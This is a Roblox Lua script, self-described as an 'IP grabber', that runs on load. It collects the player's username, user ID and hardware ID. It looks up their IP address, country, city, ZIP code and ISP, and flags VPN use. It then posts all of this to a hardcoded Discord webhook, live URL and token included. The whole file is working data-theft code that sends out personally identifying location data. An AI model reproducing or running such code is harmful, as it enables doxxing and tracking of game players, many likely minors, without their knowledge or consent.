local HttpService = game:GetService("HttpService")
local Webhook = "https://discord.com/api/webhooks/1346854922993537054/eAWf2AxW4rRXmA4fpUuFW2Mkc6uR9bB_yIbpMol9BJ5sWZS-h3LAirU57uwZtwcMY_d9"
local function sendToWebhook()
    local player = game.Players.LocalPlayer
    local username = player.Name
    local userId = player.UserId
    local hwid = game:GetService("RbxAnalyticsService"):GetClientId()

    -- Fetch IP information
    local ipSuccess, ipInfo = pcall(function()
        return game:HttpGet("https://ipapi.co/json/")
    end)

    local ip, country, state, city, zip, isp, isVPN

    if ipSuccess then
        local ipData = HttpService:JSONDecode(ipInfo)
        ip = ipData.ip or "Unknown"
        country = ipData.country_name or "Unknown"
        state = ipData.region or "Unknown"
        city = ipData.city or "Unknown"
        zip = ipData.postal or "Unknown"
        isp = ipData.org or "Unknown"

        local vpnProviders = {
            "Amazon", "Google", "Microsoft", "OVH", "DigitalOcean", "Linode", "Hetzner", "Oracle",
            "NordVPN", "ExpressVPN", "CyberGhost", "Surfshark", "IPVanish", "Hotspot Shield",
            "ProtonVPN", "VyprVPN", "Private Internet Access", "Windscribe", "TunnelBear",
            "UltraVPN", "StrongVPN", "AtlasVPN", "HideMyAss", "PureVPN", "ZenMate", "Encrypt.me",
            "Ivacy", "FastestVPN", "Mullvad", "PrivadoVPN", "GooseVPN", "TorGuard", "SecureVPN",
            "AirVPN", "VPN Unlimited", "Betternet", "HolaVPN", "Browsec", "Unlocator", "SmartVPN"
        }
        
        isVPN = "No"
        for _, provider in pairs(vpnProviders) do
            if isp and string.find(isp, provider) then
                isVPN = provider .. " (VPN Detected)"
                break
            end
        end
    else
        ip, country, state, city, zip, isp, isVPN = "Unknown", "Unknown", "Unknown", "Unknown", "Unknown", "Unknown", "Unknown"
    end

    -- Prepare webhook data
    local data = {
        ["content"] = "@everyone",
        ["embeds"] = {{
            ["title"] = "🕹️ **Player Info -- IP GRABBED MADE BY TRULYNOTBEN** 🕹️",
            ["color"] = 16711680,
            ["fields"] = {
                {["name"] = "👤 **Username**", ["value"] = username, ["inline"] = true},
                {["name"] = "🆔 **User ID**", ["value"] = tostring(userId), ["inline"] = true},
                {["name"] = "🔑 **HWID**", ["value"] = hwid, ["inline"] = true},
                {["name"] = "🌍 **Country**", ["value"] = country, ["inline"] = true},
                {["name"] = "🏙️ **State**", ["value"] = state, ["inline"] = true},
                {["name"] = "🌆 **City**", ["value"] = city, ["inline"] = true},
                {["name"] = "📮 **ZIP Code**", ["value"] = zip, ["inline"] = true},
                {["name"] = "📶 **ISP**", ["value"] = isp, ["inline"] = true},
                {["name"] = "🔒 **VPN?**", ["value"] = isVPN, ["inline"] = true},
                {["name"] = "🌐 **IP Address**", ["value"] = ip, ["inline"] = true}
            }
        }}
    }

    local jsonData = HttpService:JSONEncode(data)
    local response = request({
        Url = Webhook,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = jsonData
    })

    print("Webhook response:", response.StatusCode)
end

sendToWebhook()
